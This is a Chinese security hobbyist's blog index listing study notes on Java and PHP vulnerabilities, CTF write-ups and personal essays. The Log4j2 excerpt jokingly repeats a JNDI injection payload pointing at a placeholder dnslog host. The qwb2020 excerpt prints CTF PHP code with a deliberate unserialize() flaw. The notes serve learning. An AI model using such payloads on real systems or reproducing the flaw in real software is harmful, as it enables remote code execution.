服务器过期之后

超元域这个词, 出自雪崩这本书, 人们在这个虚拟世界中可以随意行事, 尽情做自己, 这也是我的初衷: 把发言权还给我 ...

December 12, 2022 · 2148 words · ch4ser

virtualbox中搭建kubernetes集群

环境问题, 一生之敌. ...

December 12, 2022 · 981 words · ch4ser

2021年度总结

这是一篇拖延了很久的年度总结,在下决心写它的时候,我已经从过年开始无所事事地玩了十几天的游戏了,本来说好要在过年那天写的总结也一直到现在才开始动笔,着实是惭愧. ...

February 9, 2022 · 1615 words · ch4ser

pwnable尝试

尝试学pwn,放弃学pwn ...

January 27, 2022 · 1146 words · ch4ser

shiro 漏洞复现

记录shiro漏洞学习的过程, 参考https://saucer-man.com/information_security/396.html, 并在漏洞分析基础上编写检测脚本 ...

January 22, 2022 · 1869 words · ch4ser

thinkphp5漏洞学习

phpggc中关于thinkphp的攻击思路学习 ...

January 14, 2022 · 4444 words · ch4ser

log4j2 jndi 漏洞学习和调试

明天安全圈校招面试: 面试官: 请说说你会什么技能? 我: ${jndi:ldap://xxx.dnslog.cn/exp} 面试官: 请说说你最近关注过的漏洞? 我: ${jndi:ldap://xxx.dnslog.cn/exp} 面试官: 你平时有动手调试过吗? 我: ${jndi:ldap://xxx.dnslog.cn/exp} 我:这dnslog是不是卡了 这面试官怎么还没rce ...

December 11, 2021 · 700 words · ch4ser

赛博内卷

科技的发展并不代表内卷的避免,相反,一味追求在虚拟世界中开疆拓土,忽视宇宙和深海的探索开发正是人类社会内卷化的集中反映,此处的内卷,和通常的内卷定义相同,即"一类文化模式达到了某种最终的形态以后,既没有办法稳定下来,也没有办法转变为新的形态.而只能不断地在内部变得更加复杂的现象",只不过对象从普通的小群体变成了全体人类,社会矛盾的频繁爆发让人类倾向于将自己的灵与肉奉献给虚拟的神,这种奉献的热诚背后充斥着对冰冷现实的无力感和逃避,即便这种虚拟是人类自己创造出来的,他们依旧选择忽视甚至忘却这种自知,选择被奴役,膜拜和瞻仰. ...

November 19, 2021 · 1578 words · ch4ser

GhostCat(CVE-2020-1938)漏洞学习

本文主要参考 https://blog.csdn.net/qq_31481187/article/details/105917392 和 https://paper.seebug.org/1142/#_6 ,并无原创内容,仅仅是个人学习笔记。 ...

November 13, 2021 · 2256 words · ch4ser

mysql jdbc反序列化的不深入研究

我终于更新博客了…… ...

October 15, 2021 · 4802 words · ch4ser

使用idea开启Servlet

采用的是版本较新的idea2020.2, 使用的操作系统为MANJARO LINUX, 其中的过程挺迷迷糊糊的就水一篇来记录一下. File --> New --> Project --> Java --> Nextnext 新建一个项目 右键Project --> open module setting --> 点击+号 --> 导入tomcat8的Servlet-api.jar ...

October 1, 2020 · 1311 words · ch4ser

GACTF2020

simpleflask 和以往的flask不一样的地方在于, 这里是经过更新后的flask, 计算pin码的方式已经和以前不一样了, 参考 https://www.chainnews.com/articles/898433701852.htm, 不过问题不大,就把machine-id拼接在docker那一串东西的前面就可以了, 需要注意的是每十分钟重启时候的机器mac地址是会变化的. ...

August 29, 2020 · 718 words · ch4ser

qwb2020web复现

half_infiltration 开局的页面如下 <?php highlight_file(__FILE__); $flag=file_get_contents('ssrf.php'); class Pass { function read() { ob_start(); global $result; print $result; } } class User { public $age,$sex,$num; function __destruct() { $student = $this->age; $boy = $this->sex; $a = $this->num; $student->$boy(); if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student))) { ob_end_clean(); exit(); } global $$a; $result=$GLOBALS['flag']; ob_end_clean(); } } if (isset($_GET['x'])) { unserialize($_GET['x'])->get_it(); } 思路是进行两次反序列化, 第一次将$_GLOBALS[‘flag’]赋值给全局变量$result, 第二次反序列化是让程序在ob_end_clean()执行之前报错退出. ob_start会打开输出缓冲 ...

August 27, 2020 · 828 words · ch4ser

http请求走私笔记

正常的请求 ...

August 24, 2020 · 1144 words · ch4ser

ciscn2020_online

web越來越没有牌面了…国赛果然是pwn和misc的天下 ...

August 20, 2020 · 550 words · ch4ser

网鼎杯2020 web

filejava 提供了文件上传和下载的功能, 在下载功能那里我们可以任意文件读取, 通过把文件名换成文件夹名字可以在报错中爆出绝对路径, 如图: 绝对路径 /usr/local/tomcat/webapps/ROOT/WEB-INF/upload/0/10/ 读文件/etc/passwd ...

May 11, 2020 · 1523 words · ch4ser

padding_oracle 和 cbc字节反转

padding oracle 原理: https://www.freebuf.com/articles/database/150606.html ...

February 3, 2020 · 2580 words · ch4ser

临行前夜--2019

昨晚约好的车今天早上竟然被司机一声不吭取消了, 真的无语……得亏睡得浅起床看了一眼.新约的车又要早早开往机场, 于是无奈起了个大早. 到达后又被通知延误, 也不知和离开时候的飞雪有无关系, 但不管怎样, 孤身顶着鹅毛行走路上, 这样离开倒还是别有风味, 于是也有了碎碎念的兴致. ...

January 8, 2020 · 518 words · ch4ser

java_web题目复现记录

开一个新坑~~ ...

January 3, 2020 · 2389 words · ch4ser

LD_PRELOAD劫持类型题目

贴几个参考链接 https://www.cnblogs.com/wfzWebSecuity/p/11213732.html https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD ...

December 26, 2019 · 1713 words · ch4ser